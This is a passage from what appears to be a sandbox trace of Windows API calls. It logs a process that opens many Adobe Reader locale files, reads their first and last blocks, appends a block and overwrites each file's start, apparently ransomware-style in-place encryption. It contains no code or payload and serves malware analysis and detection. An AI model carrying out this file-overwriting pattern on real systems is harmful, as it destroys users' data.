lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.011] CloseHandle (hObject=0x1fc) returned 1 [0085.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Search.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\search.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.012] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.012] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5c00 [0085.012] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.012] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.012] ReleaseMutex (hMutex=0x168) returned 1 [0085.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.RUS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.RUS", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.RUS", lpUsedDefaultChar=0x0) returned 10 [0085.012] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.016] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4c00 [0085.016] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.020] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4c00 [0085.020] WriteFile (in: hFile=0x1fc, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.021] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.021] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.021] CloseHandle (hObject=0x1fc) returned 1 [0085.021] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Acroform.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\acroform.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.022] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.022] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x65800 [0085.022] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.022] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.022] ReleaseMutex (hMutex=0x168) returned 1 [0085.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.SKY", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.SKY", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.SKY", lpUsedDefaultChar=0x0) returned 12 [0085.023] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.025] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x64800 [0085.025] ReadFile (in: hFile=0x1fc, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.029] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x64800 [0085.030] WriteFile (in: hFile=0x1fc, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.030] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.030] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.030] CloseHandle (hObject=0x1fc) returned 1 [0085.030] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\EScript.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\escript.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.031] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.031] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x9e00 [0085.031] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.031] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.031] ReleaseMutex (hMutex=0x168) returned 1 [0085.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.SKY", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.SKY", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.SKY", lpUsedDefaultChar=0x0) returned 11 [0085.032] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.034] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8e00 [0085.034] ReadFile (in: hFile=0x1fc, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.038] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8e00 [0085.039] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.039] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.039] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.039] CloseHandle (hObject=0x1fc) returned 1 [0085.040] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\reflow.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\reflow.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.040] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.040] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1200 [0085.040] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.040] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.041] ReleaseMutex (hMutex=0x168) returned 1 [0085.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.SKY", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.SKY", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.SKY", lpUsedDefaultChar=0x0) returned 10 [0085.041] ReadFile (in: hFile=0x1fc, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x2d5f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0085.042] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0085.043] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0085.043] CloseHandle (hObject=0x1fc) returned 1 [0085.043] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\WebLink.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\weblink.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.044] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.044] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6e00 [0085.044] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.044] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.044] ReleaseMutex (hMutex=0x168) returned 1 [0085.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.SKY", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.SKY", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WebLink.SKY", lpUsedDefaultChar=0x0) returned 11 [0085.044] ReadFile (in: hFile=0x1fc, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.049] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5e00 [0085.049] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.054] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5e00 [0085.055] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.055] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.055] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.056] CloseHandle (hObject=0x1fc) returned 1 [0085.056] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\DVA.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\dva.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.056] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.057] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4600 [0085.057] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.057] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.057] ReleaseMutex (hMutex=0x168) returned 1 [0085.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.SLV", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0085.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.SLV", cchWideChar=7, lpMultiByteStr=0x1f7aa8c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.SLV", lpUsedDefaultChar=0x0) returned 7 [0085.057] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.059] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3600 [0085.060] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.060] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3600 [0085.061] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.061] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.061] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.061] CloseHandle (hObject=0x1fc) returned 1 [0085.062] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\RdLang32.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\rdlang32.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.063] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.063] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x146000 [0085.063] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.063] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.064] ReleaseMutex (hMutex=0x168) returned 1 [0085.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.SLV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.SLV", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.SLV", lpUsedDefaultChar=0x0) returned 12 [0085.064] ReadFile (in: hFile=0x1fc, lpBuffer=0x28a3918, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0085.066] ReadFile (in: hFile=0x1fc, lpBuffer=0x28a3918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.068] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x145000 [0085.068] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.279] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x145000 [0085.295] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.295] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.295] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0085.296] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.296] CloseHandle (hObject=0x1fc) returned 1 [0085.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Spelling.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\spelling.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.418] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.424] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2800 [0085.424] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.424] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.424] ReleaseMutex (hMutex=0x168) returned 1 [0085.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.SLV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.SLV", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.SLV", lpUsedDefaultChar=0x0) returned 12 [0085.424] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.427] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1800 [0085.427] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, 